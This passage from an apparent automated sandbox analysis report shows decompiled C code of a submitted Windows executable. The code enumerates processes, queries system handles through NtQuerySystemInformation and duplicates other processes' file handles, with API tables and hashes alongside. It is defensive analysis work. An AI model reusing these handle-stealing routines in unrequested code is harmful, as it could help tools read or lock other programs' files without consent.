                                                                                                                                                  • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330760,103332E0), ref: 1000EC2B
                                                                                                                                                  • Part of subcall function 10001EF0: std::exception::exception.LIBCMT ref: 10001F13
                                                                                                                                                Strings
                                                                                                                                                • invalid string position, xrefs: 10004438
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                • String ID: invalid string position
                                                                                                                                                • API String ID: 2977319401-1799206989
                                                                                                                                                • Opcode ID: 517e03da3c5cc15a0561414186fff577991a24e91ecfc2b458e1a1a669852aa6
                                                                                                                                                • Instruction ID: 183d1e3e387516a94398dfdb2ceda930dac9fd17066dab5377ceff19e0cdabbb
                                                                                                                                                • Opcode Fuzzy Hash: 517e03da3c5cc15a0561414186fff577991a24e91ecfc2b458e1a1a669852aa6
                                                                                                                                                • Instruction Fuzzy Hash: BEE09275800158EBD710DBD4EC41ADFB778EF04390F80891AF645B710ACBB5A948CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Analysis Process: 1611946678493.exe PID: 5404 Parent PID: 2124 1611946678493.exeCOMMON

                                                                                                                                                Executed Functions

                                                                                                                                                Function 0040CE93, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 122processlibraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E0040CE93(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				void _v1102;
				void* _v1104;
				intOrPtr _v1636;
				long _v1652;
				void _v1656;
				void* _v1660;
				void* __edi;
				void* __esi;
				void* _t42;
				int _t47;
				long _t50;
				void* _t51;
				void* _t57;
				struct HINSTANCE__* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t79;
				void* _t84;
				void* _t85;
				void* _t86;

				_t79 = _a4;
				_t2 = _t79 + 0x2c; // 0x40c800
				E00403F55(_t2);
				_t42 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t42;
				memset( &_v1656, 0, 0x228);
				_t85 = _t84 + 0xc;
				_v1660 = 0x22c;
				Process32FirstW(_v12,  &_v1660); // executed
				while(1) {
					_t47 = Process32NextW(_v12,  &_v1660); // executed
					if(_t47 == 0) {
						break;
					}
					E0040C997( &_v580);
					_t50 = _v1652;
					_v580 = _t50;
					_v52 = _v1636;
					_t51 = OpenProcess(0x410, 0, _t50);
					__eflags = _t51;
					_v8 = _t51;
					if(_t51 != 0) {
						L4:
						_v1104 = 0;
						memset( &_v1102, 0, 0x208);
						_t86 = _t85 + 0xc;
						E0040D049(_t79, _v8,  &_v1104);
						__eflags = _v1104;
						if(_v1104 == 0) {
							L6:
							__eflags =  *0x4136ec; // 0x1
							_v16 = 0x104;
							if(__eflags == 0) {
								_t69 = GetModuleHandleW(L"kernel32.dll");
								__eflags = _t69;
								if(_t69 != 0) {
									 *0x4136ec = 1;
									 *0x4136f0 = GetProcAddress(_t69, "QueryFullProcessImageNameW");
								}
							}
							_t57 =  *0x4136f0;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57(_v8, 0,  &_v1104,  &_v16); // executed
							}
							L11:
							E0040CAF2( &_v576,  &_v1104);
							E0040CE3D(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t85 = _t86 + 0x14;
							CloseHandle(_v8);
							_t79 = _a4;
							L12:
							_t37 = _t79 + 0x2c; // 0x40c800
							E0040D0D3(_t37,  &_v580);
							continue;
						}
						__eflags = _v1104 - 0x3f;
						if(_v1104 != 0x3f) {
							goto L11;
						}
						goto L6;
					}
					_t71 = E004058FB();
					__eflags =  *((intOrPtr*)(_t71 + 4)) - 5;
					if( *((intOrPtr*)(_t71 + 4)) <= 5) {
						goto L12;
					}
					_t72 = OpenProcess(0x1000, 0, _v580);
					__eflags = _t72;
					_v8 = _t72;
					if(_t72 == 0) {
						goto L12;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

































                                                                                                                                                0x0040ce9f
                                                                                                                                                0x0040cea2
                                                                                                                                                0x0040cea5
                                                                                                                                                0x0040ceaf
                                                                                                                                                0x0040ceb9
                                                                                                                                                0x0040cec4
                                                                                                                                                0x0040cec9
                                                                                                                                                0x0040ced6
                                                                                                                                                0x0040cee0
                                                                                                                                                0x0040d022
                                                                                                                                                0x0040d02c
                                                                                                                                                0x0040d033
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cef0
                                                                                                                                                0x0040cef5
                                                                                                                                                0x0040cf0e
                                                                                                                                                0x0040cf14
                                                                                                                                                0x0040cf17
                                                                                                                                                0x0040cf19
                                                                                                                                                0x0040cf1b
                                                                                                                                                0x0040cf1e
                                                                                                                                                0x0040cf48
                                                                                                                                                0x0040cf55
                                                                                                                                                0x0040cf5c
                                                                                                                                                0x0040cf61
                                                                                                                                                0x0040cf70
                                                                                                                                                0x0040cf75
                                                                                                                                                0x0040cf7c
                                                                                                                                                0x0040cf88
                                                                                                                                                0x0040cf88
                                                                                                                                                0x0040cf8e
                                                                                                                                                0x0040cf95
                                                                                                                                                0x0040cf9c
                                                                                                                                                0x0040cfa2
                                                                                                                                                0x0040cfa4
                                                                                                                                                0x0040cfac
                                                                                                                                                0x0040cfbc
                                                                                                                                                0x0040cfbc
                                                                                                                                                0x0040cfa4
                                                                                                                                                0x0040cfc1
                                                                                                                                                0x0040cfc6
                                                                                                                                                0x0040cfc8
                                                                                                                                                0x0040cfd9
                                                                                                                                                0x0040cfd9
                                                                                                                                                0x0040cfdb
                                                                                                                                                0x0040cfe7
                                                                                                                                                0x0040cfff
                                                                                                                                                0x0040d004
                                                                                                                                                0x0040d00a
                                                                                                                                                0x0040d010
                                                                                                                                                0x0040d013
                                                                                                                                                0x0040d01a
                                                                                                                                                0x0040d01d
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d01d
                                                                                                                                                0x0040cf7e
                                                                                                                                                0x0040cf86
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cf86
                                                                                                                                                0x0040cf20
                                                                                                                                                0x0040cf25
                                                                                                                                                0x0040cf29
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cf3b
                                                                                                                                                0x0040cf3d
                                                                                                                                                0x0040cf3f
                                                                                                                                                0x0040cf42
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cf42
                                                                                                                                                0x0040d046

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CEAF
                                                                                                                                                • memset.MSVCRT ref: 0040CEC4
                                                                                                                                                • Process32FirstW.KERNEL32(0040C7D4,?), ref: 0040CEE0
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 0040CF17
                                                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 0040CF3B
                                                                                                                                                • memset.MSVCRT ref: 0040CF5C
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 0040CF9C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0040CFB6
                                                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(?,00000000,?,00000104,?,?), ref: 0040CFD9
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 0040D00A
                                                                                                                                                • Process32NextW.KERNEL32(0040C7D4,0000022C), ref: 0040D02C
                                                                                                                                                • CloseHandle.KERNEL32(0040C7D4,0040C7D4,0000022C,?,?,?,?,?,?), ref: 0040D03C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                • String ID: ?$QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                • API String ID: 239888749-1549906504
                                                                                                                                                • Opcode ID: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
                                                                                                                                                • Instruction ID: b0c56ac076400066d7f85ee915419da0325970425bfee0af64f00aa3922c561f
                                                                                                                                                • Opcode Fuzzy Hash: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
                                                                                                                                                • Instruction Fuzzy Hash: E2413DB1D00119EEDF20DFA1DC85ADEB7B9EB04308F0041BAE609B2191D7755F998F99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040C6FB, Relevance: 19.7, APIs: 13, Instructions: 207fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E0040C6FB(void*** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, long* _a12, signed int* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v36;
				intOrPtr _v40;
				int _v44;
				intOrPtr _v48;
				int _v52;
				char _v56;
				int _v60;
				intOrPtr _v64;
				int _v68;
				char _v72;
				int _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				int _v100;
				void _v622;
				short _v624;
				char _v1616;
				void _v1623;
				char _v1624;
				void* __esi;
				void* _t97;
				void* _t99;
				long _t101;
				intOrPtr _t102;
				void* _t110;
				void* _t111;
				void* _t114;
				void* _t116;
				void* _t128;
				void* _t131;
				signed char* _t152;
				void* _t153;
				void** _t154;
				void*** _t155;
				intOrPtr _t158;
				signed short* _t159;
				void* _t163;
				void* _t164;
				void* _t165;

				_t165 = __eflags;
				_t155 = __eax;
				_v28 = 0;
				_v32 = 0;
				_v624 = 0;
				memset( &_v622, 0, 0x208);
				E00405800( &_v624);
				_t164 = _t163 + 0x10;
				_t97 = CreateFileW( &_v624, 0x80000000, 3, 0, 3, 0, 0); // executed
				_v12 = _t97;
				_t99 = E0040C572(_t155, _t165); // executed
				_v16 = _t99;
				FindCloseChangeNotification(_v12); // executed
				_t154 =  *_t155;
				_t101 = GetCurrentProcessId();
				if(_v16 == 0) {
					_t153 =  *_t154;
					if(_t153 > 0) {
						_t152 =  &(_t154[2]);
						do {
							if(( *(_t152 - 4) & 0x0000ffff) == _t101 && (_t152[2] & 0x0000ffff) == _v12) {
								_v32 =  *_t152 & 0x000000ff;
							}
							_t152 =  &(_t152[0x10]);
							_t153 = _t153 - 1;
							_t170 = _t153;
						} while (_t153 != 0);
					}
				}
				_t102 = 0x20;
				_v64 = _t102;
				_v48 = _t102;
				_v72 = 0;
				_v60 = 0;
				_v68 = 0;
				_v56 = 0;
				_v44 = 0;
				_v52 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				E0040CE93(_t153, _t170,  &_v100); // executed
				_v20 = 0;
				if(_v44 > 0) {
					do {
						_t110 = E0040C982(_v20,  &_v56);
						_t36 = _t110 + 4; // 0x4
						_v12 = _t110;
						_t111 = E00405888(_t36);
						_t158 = _a4;
						_v16 = _t111;
						_v8 = 0;
						if( *((intOrPtr*)(_t158 + 0x1c)) <= 0) {
							goto L26;
						} else {
							while(1) {
								_t114 = E00406306(_t158, _v8);
								_push(_v16);
								_push(_t114);
								L0040E03E();
								if(_t114 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 <  *((intOrPtr*)(_t158 + 0x1c))) {
									continue;
								} else {
									goto L26;
								}
								goto L27;
							}
							_t116 = OpenProcess(0x40, 0,  *_v12);
							__eflags = _t116;
							_v16 = _t116;
							if(_t116 != 0) {
								__eflags =  *_t154;
								_v24 = 0;
								if( *_t154 > 0) {
									_t159 =  &(_t154[1]);
									do {
										__eflags = ( *_t159 & 0x0000ffff) -  *_v12;
										if(( *_t159 & 0x0000ffff) !=  *_v12) {
											goto L21;
										} else {
											__eflags = (_t159[2] & 0x000000ff) - _v32;
											if((_t159[2] & 0x000000ff) != _v32) {
												goto L21;
											} else {
												_v8 = 0;
												DuplicateHandle(_v16, _t159[3] & 0x0000ffff, GetCurrentProcess(),  &_v8, 0x80000000, 0, 2); // executed
												__eflags = _v8;
												if(_v8 == 0) {
													goto L21;
												} else {
													_v1624 = 0;
													memset( &_v1623, 0, 0x3e7);
													_t164 = _t164 + 0xc;
													_v36 = 0;
													E0040C41D();
													_t128 =  *0x4132a8;
													__eflags = _t128;
													if(_t128 != 0) {
														 *_t128(_v8, 1,  &_v1624, 0x3e4,  &_v36);
													}
													CloseHandle(_v8);
													_v40 = E00405888( &_v1616);
													_t131 = E00405888(_a8);
													_push(_t131);
													_push(_v40);
													L0040E03E();
													__eflags = _t131;
													if(_t131 == 0) {
														 *_a12 =  *_v12;
														_v28 = 1;
														 *_a16 = _t159[3] & 0x0000ffff;
													} else {
														goto L21;
													}
												}
											}
										}
										goto L24;
										L21:
										_v24 = _v24 + 1;
										_t159 =  &(_t159[8]);
										__eflags = _v24 -  *_t154;
									} while (_v24 <  *_t154);
								}
								L24:
								CloseHandle(_v16);
							}
							__eflags = _v28;
							if(_v28 == 0) {
								goto L26;
							}
						}
						goto L27;
						L26:
						_v20 = _v20 + 1;
					} while (_v20 < _v44);
				}
				L27:
				if(_v100 != 0) {
					FreeLibrary(_v100); // executed
					_v100 = 0;
				}
				E00403F55( &_v56);
				E00403F55( &_v72);
				return _v28;
			}




















































                                                                                                                                                0x0040c6fb
                                                                                                                                                0x0040c70e
                                                                                                                                                0x0040c718
                                                                                                                                                0x0040c71b
                                                                                                                                                0x0040c71e
                                                                                                                                                0x0040c725
                                                                                                                                                0x0040c731
                                                                                                                                                0x0040c736
                                                                                                                                                0x0040c74c
                                                                                                                                                0x0040c752
                                                                                                                                                0x0040c757
                                                                                                                                                0x0040c75f
                                                                                                                                                0x0040c762
                                                                                                                                                0x0040c768
                                                                                                                                                0x0040c76a
                                                                                                                                                0x0040c773
                                                                                                                                                0x0040c775
                                                                                                                                                0x0040c779
                                                                                                                                                0x0040c77b
                                                                                                                                                0x0040c77e
                                                                                                                                                0x0040c784
                                                                                                                                                0x0040c792
                                                                                                                                                0x0040c792
                                                                                                                                                0x0040c795
                                                                                                                                                0x0040c798
                                                                                                                                                0x0040c798
                                                                                                                                                0x0040c798
                                                                                                                                                0x0040c77e
                                                                                                                                                0x0040c779
                                                                                                                                                0x0040c79d
                                                                                                                                                0x0040c79e
                                                                                                                                                0x0040c7a1
                                                                                                                                                0x0040c7a8
                                                                                                                                                0x0040c7ab
                                                                                                                                                0x0040c7ae
                                                                                                                                                0x0040c7b1
                                                                                                                                                0x0040c7b4
                                                                                                                                                0x0040c7b7
                                                                                                                                                0x0040c7ba
                                                                                                                                                0x0040c7bd
                                                                                                                                                0x0040c7c0
                                                                                                                                                0x0040c7c3
                                                                                                                                                0x0040c7c6
                                                                                                                                                0x0040c7c9
                                                                                                                                                0x0040c7cc
                                                                                                                                                0x0040c7cf
                                                                                                                                                0x0040c7d7
                                                                                                                                                0x0040c7da
                                                                                                                                                0x0040c7e0
                                                                                                                                                0x0040c7e6
                                                                                                                                                0x0040c7eb
                                                                                                                                                0x0040c7ee
                                                                                                                                                0x0040c7f1
                                                                                                                                                0x0040c7f6
                                                                                                                                                0x0040c7fc
                                                                                                                                                0x0040c7ff
                                                                                                                                                0x0040c802
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c808
                                                                                                                                                0x0040c808
                                                                                                                                                0x0040c80d
                                                                                                                                                0x0040c812
                                                                                                                                                0x0040c815
                                                                                                                                                0x0040c816
                                                                                                                                                0x0040c81f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c821
                                                                                                                                                0x0040c82a
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c82c
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c82c
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c82a
                                                                                                                                                0x0040c839
                                                                                                                                                0x0040c83f
                                                                                                                                                0x0040c841
                                                                                                                                                0x0040c844
                                                                                                                                                0x0040c84a
                                                                                                                                                0x0040c84c
                                                                                                                                                0x0040c84f
                                                                                                                                                0x0040c855
                                                                                                                                                0x0040c858
                                                                                                                                                0x0040c85e
                                                                                                                                                0x0040c860
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c866
                                                                                                                                                0x0040c86a
                                                                                                                                                0x0040c86d
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c873
                                                                                                                                                0x0040c87f
                                                                                                                                                0x0040c891
                                                                                                                                                0x0040c897
                                                                                                                                                0x0040c89a
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c89c
                                                                                                                                                0x0040c8a9
                                                                                                                                                0x0040c8af
                                                                                                                                                0x0040c8b4
                                                                                                                                                0x0040c8b7
                                                                                                                                                0x0040c8ba
                                                                                                                                                0x0040c8bf
                                                                                                                                                0x0040c8c4
                                                                                                                                                0x0040c8c6
                                                                                                                                                0x0040c8dd
                                                                                                                                                0x0040c8dd
                                                                                                                                                0x0040c8e2
                                                                                                                                                0x0040c8f6
                                                                                                                                                0x0040c8f9
                                                                                                                                                0x0040c8fe
                                                                                                                                                0x0040c8ff
                                                                                                                                                0x0040c902
                                                                                                                                                0x0040c907
                                                                                                                                                0x0040c90b
                                                                                                                                                0x0040c928
                                                                                                                                                0x0040c931
                                                                                                                                                0x0040c938
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c90b
                                                                                                                                                0x0040c89a
                                                                                                                                                0x0040c86d
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c90d
                                                                                                                                                0x0040c90d
                                                                                                                                                0x0040c913
                                                                                                                                                0x0040c916
                                                                                                                                                0x0040c916
                                                                                                                                                0x0040c91e
                                                                                                                                                0x0040c93a
                                                                                                                                                0x0040c93d
                                                                                                                                                0x0040c93d
                                                                                                                                                0x0040c943
                                                                                                                                                0x0040c946
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c946
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c948
                                                                                                                                                0x0040c948
                                                                                                                                                0x0040c94e
                                                                                                                                                0x0040c7e0
                                                                                                                                                0x0040c957
                                                                                                                                                0x0040c95a
                                                                                                                                                0x0040c95f
                                                                                                                                                0x0040c965
                                                                                                                                                0x0040c965
                                                                                                                                                0x0040c96b
                                                                                                                                                0x0040c973
                                                                                                                                                0x0040c97f

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C725
                                                                                                                                                  • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?,00000000), ref: 0040C839
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000002,?,?,?,00000000), ref: 0040C882
                                                                                                                                                • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000), ref: 0040C891
                                                                                                                                                • memset.MSVCRT ref: 0040C8AF
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040C8E2
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040C902
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0040C93D
                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 0040C95F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandleProcess$CurrentFile_wcsicmpmemset$ChangeCreateDuplicateFindFreeLibraryModuleNameNotificationOpen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 832456665-0
                                                                                                                                                • Opcode ID: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
                                                                                                                                                • Instruction ID: de6e42d4d0ab8c6b3742c2937cd5abb5ca9b3ab329c089935e202bb2c8060a11
                                                                                                                                                • Opcode Fuzzy Hash: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
                                                                                                                                                • Instruction Fuzzy Hash: 6A81F2B1C00219EFDB10EFA5C9859AEBBB5FB08305F6085BAE905B7291D7385E44CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040C516, Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040C516(signed int* __eax, void* _a4, long _a8, long* _a12) {
				signed int _t5;
				long _t7;

				_t5 =  *__eax;
				if(_t5 == 0) {
					return _t5 | 0xffffffff;
				}
				_t7 = NtQuerySystemInformation(0x10, _a4, _a8, _a12); // executed
				return _t7;
			}





                                                                                                                                                0x0040c516
                                                                                                                                                0x0040c51a
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c52e
                                                                                                                                                0x0040c52a
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,?,?,?,0040C5A6,00000000,00001000,00000000,?,?,00000000), ref: 0040C52A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InformationQuerySystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3562636166-0
                                                                                                                                                • Opcode ID: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
                                                                                                                                                • Instruction ID: c4ee8ba0ae0e5c888482442c657d74a2bffdce45b5391c025a143593a4db9a10
                                                                                                                                                • Opcode Fuzzy Hash: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
                                                                                                                                                • Instruction Fuzzy Hash: 16C0123D108200FEDA014BA08C40E0FB791AF89770F14CB19B174900E0C2B1D020A722
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040BE98, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 155COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E0040BE98(void* __ecx, void* __edx, void* __eflags, intOrPtr _a12, char _a24, struct HWND__* _a28, struct HWND__* _a32, intOrPtr _a36, struct HWND__* _a40, struct tagMSG _a44, char _a72, char _a76, struct HWND__* _a592, struct HACCEL__* _a616, intOrPtr _a664, intOrPtr _a1792, char* _a1800, struct HWND__* _a1820) {
				char _v4;
				char _v8;
				struct HWND__* _v12;
				void* __edi;
				void* __esi;
				void* _t42;
				struct HWND__* _t53;
				void* _t60;
				struct HWND__* _t69;
				struct HWND__* _t71;
				struct HWND__* _t76;
				int _t82;
				int _t84;
				struct HWND__* _t85;
				void* _t93;
				struct HWND__* _t107;
				struct HWND__* _t108;

				_t93 = __edx;
				_t92 = __ecx;
				E0040E340(0x27a4, __ecx);
				_t42 = E00402754(_t92);
				if(_t42 != 0) {
					E0040DA9D();
					SetErrorMode(0x8001); // executed
					 *0x412b10 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040DA82, 0); // executed
					E0040621C( &_v4);
					_push( &_a76);
					_a36 = 0x20;
					_a28 = 0;
					_a40 = 0;
					_a32 = 0;
					_a44.hwnd = 0;
					E0040BB15(__eflags);
					_a1800 =  &_v8;
					E004064A1(_t92, __eflags,  &_v8, _a12); // executed
					_t53 = E004065C4(_a1792, L"/savelangfile");
					__eflags = _t53;
					if(_t53 < 0) {
						E00407259(); // executed
						__eflags = E004065C4(_a1800, L"/deleteregkey");
						if(__eflags < 0) {
							__eflags =  *((intOrPtr*)(_a1800 + 0x30)) - 1;
							if(__eflags <= 0) {
								L7:
								E0040BA94( &_a72);
								__eflags = _a664 - 3;
								if(_a664 != 3) {
									_push(5);
								} else {
									_push(3);
								}
								ShowWindow(_a592, ??);
								UpdateWindow(_a592);
								_a616 = LoadAcceleratorsW(GetModuleHandleW(0), 0x67);
								__eflags = GetMessageW( &_a44, 0, 0, 0);
								while(__eflags != 0) {
									_t69 =  *0x412c2c; // 0x0
									__eflags = _t69;
									_t107 = _t69;
									if(_t69 == 0) {
										L14:
										_t71 = TranslateAcceleratorW(_a592, _a616,  &_a44);
										__eflags = _t71;
										if(_t71 == 0) {
											goto L15;
										}
									} else {
										_t85 = GetForegroundWindow();
										__eflags = _t107 - _t85;
										if(_t107 == _t85) {
											L15:
											_t108 =  *0x412c2c; // 0x0
											_v12 = _a1820;
											_t76 = IsDialogMessageW(_a592,  &_a44);
											__eflags = _t76;
											if(_t76 == 0) {
												__eflags = _t108;
												if(_t108 == 0) {
													L18:
													__eflags = _v12;
													if(_v12 == 0) {
														L20:
														TranslateMessage( &_a44);
														DispatchMessageW( &_a44);
													} else {
														_t82 = IsDialogMessageW(_v12,  &_a44);
														__eflags = _t82;
														if(_t82 == 0) {
															goto L20;
														}
													}
												} else {
													_t84 = IsDialogMessageW(_t108,  &_a44);
													__eflags = _t84;
													if(_t84 == 0) {
														goto L18;
													}
												}
											}
										} else {
											goto L14;
										}
									}
									__eflags = GetMessageW( &_a44, 0, 0, 0);
								}
							} else {
								__eflags = E0040BD40( &_a72, _t93, __eflags);
								if(__eflags == 0) {
									goto L7;
								}
							}
						}
					} else {
						 *0x4131d0 = 0x412374;
						E004073F7(_t92);
					}
					E0040BC51( &_a72, __eflags);
					E0040623E( &_v8);
					E00403F55( &_a24);
					E0040623E( &_v8);
					_t60 = 0;
					__eflags = 0;
				} else {
					_t60 = _t42 + 1;
				}
				return _t60;
			}




















                                                                                                                                                0x0040be98
                                                                                                                                                0x0040be98
                                                                                                                                                0x0040bea3
                                                                                                                                                0x0040beab
                                                                                                                                                0x0040beb2
                                                                                                                                                0x0040beba
                                                                                                                                                0x0040bec4
                                                                                                                                                0x0040bed9
                                                                                                                                                0x0040bee6
                                                                                                                                                0x0040bef0
                                                                                                                                                0x0040bef9
                                                                                                                                                0x0040befa
                                                                                                                                                0x0040bf02
                                                                                                                                                0x0040bf06
                                                                                                                                                0x0040bf0a
                                                                                                                                                0x0040bf0e
                                                                                                                                                0x0040bf12
                                                                                                                                                0x0040bf1f
                                                                                                                                                0x0040bf26
                                                                                                                                                0x0040bf37
                                                                                                                                                0x0040bf3c
                                                                                                                                                0x0040bf3e
                                                                                                                                                0x0040bf54
                                                                                                                                                0x0040bf6a
                                                                                                                                                0x0040bf6c
                                                                                                                                                0x0040bf79
